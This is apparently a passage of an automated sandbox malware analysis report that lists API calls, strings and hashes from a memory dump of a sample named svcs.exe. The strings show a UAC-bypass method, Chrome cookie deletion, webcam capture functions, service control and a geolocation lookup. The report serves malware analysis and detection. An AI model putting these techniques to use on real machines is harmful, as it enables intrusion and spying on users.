                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                • _wcslen.LIBCMT ref: 0041B763
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                • API String ID: 3286818993-122982132
                                • Opcode ID: ff64268ecf0c31a6c4424bc126999b380d0383f46c80c29dc48f1e307bbff0a4
                                • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                • Opcode Fuzzy Hash: ff64268ecf0c31a6c4424bc126999b380d0383f46c80c29dc48f1e307bbff0a4
                                • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                • Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                Strings
                                • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleOpen$FileRead
                                • String ID: http://geoplugin.net/json.gp
                                • API String ID: 3121278467-91888290
                                • Opcode ID: 1e9fec68a0fa9a491aeb73d0e269fc382ae80b43ef1841fb67e99dd13ca0ad51
                                • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                • Opcode Fuzzy Hash: 1e9fec68a0fa9a491aeb73d0e269fc382ae80b43ef1841fb67e99dd13ca0ad51
                                • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                • int.LIBCPMT ref: 00411183
                                  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                • std::_Facet_Register.LIBCPMT ref: 004111C3
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                • String ID: (mG
                                • API String ID: 2536120697-4059303827
                                • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                  • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                  • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                  • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                                • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 782494840-2070987746
                                • Opcode ID: f4059261ec9105722489d9fd436038e764cf76dffb1ecded69b4c09404498de6
                                • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                • Opcode Fuzzy Hash: f4059261ec9105722489d9fd436038e764cf76dffb1ecded69b4c09404498de6
                                • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                • Opcode Fuzzy Hash: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\microsofts\svcs.exe), ref: 004075D0
                                  • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                  • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                • CoUninitialize.OLE32 ref: 00407629
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: InitializeObjectUninitialize_wcslen
                                • String ID: C:\Users\user\AppData\Roaming\microsofts\svcs.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                • API String ID: 3851391207-330212333
                                • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                • GetLastError.KERNEL32 ref: 0040BAE7
                                Strings
                                • UserProfile, xrefs: 0040BAAD
                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                • [Chrome Cookies not found], xrefs: 0040BB01
                                • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                • API String ID: 2018770650-304995407
                                • Opcode ID: c69a48e60de484867d8b749c5ae4c270b90bc560c43d961a50d917c7878b2bfc
                                • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                • Opcode Fuzzy Hash: c69a48e60de484867d8b749c5ae4c270b90bc560c43d961a50d917c7878b2bfc
                                • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: SG$C:\Users\user\AppData\Roaming\microsofts\svcs.exe$hdF
                                • API String ID: 0-2415698853
                                • Opcode ID: 1c629e4396ebd3af338879a422fac1621c8df490be40c15e87bc48e2ed270b23
                                • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                • Opcode Fuzzy Hash: 1c629e4396ebd3af338879a422fac1621c8df490be40c15e87bc48e2ed270b23
                                • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$PkGNG$mscoree.dll
                                • API String ID: 4061214504-213444651
                                • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __allrem.LIBCMT ref: 0043AC69
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                • __allrem.LIBCMT ref: 0043AC9C
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                • __allrem.LIBCMT ref: 0043ACD1
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: H_prologSleep
                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                • API String ID: 3469354165-3054508432
                                • Opcode ID: 2bae3fc1a4521fd6cfe0abfe2e334f7941d0747335ff3d87f549c58b7eefc5ba
                                • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                • Opcode Fuzzy Hash: 2bae3fc1a4521fd6cfe0abfe2e334f7941d0747335ff3d87f549c58b7eefc5ba
                                • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe
                                • String ID:
                                • API String ID: 4189289331-0
                                • Opcode ID: bc22737b9e07c01bfe43bbe439fdc0bac90f3fb6b0d8d7516700c90120c40b46
                                • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                • Opcode Fuzzy Hash: bc22737b9e07c01bfe43bbe439fdc0bac90f3fb6b0d8d7516700c90120c40b46
                                • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alldvrm$_strrchr
                                • String ID: PkGNG
                                • API String ID: 1036877536-263838557
                                • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                • _free.LIBCMT ref: 0044824C
                                • _free.LIBCMT ref: 00448274
                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                • _abort.LIBCMT ref: 00448293
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                • Opcode Fuzzy Hash: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 966b63bd912de40b5b615a00da15e5d8939a9a4c78db0212e4922df61029cb32
                                • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                • Opcode Fuzzy Hash: 966b63bd912de40b5b615a00da15e5d8939a9a4c78db0212e4922df61029cb32
                                • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
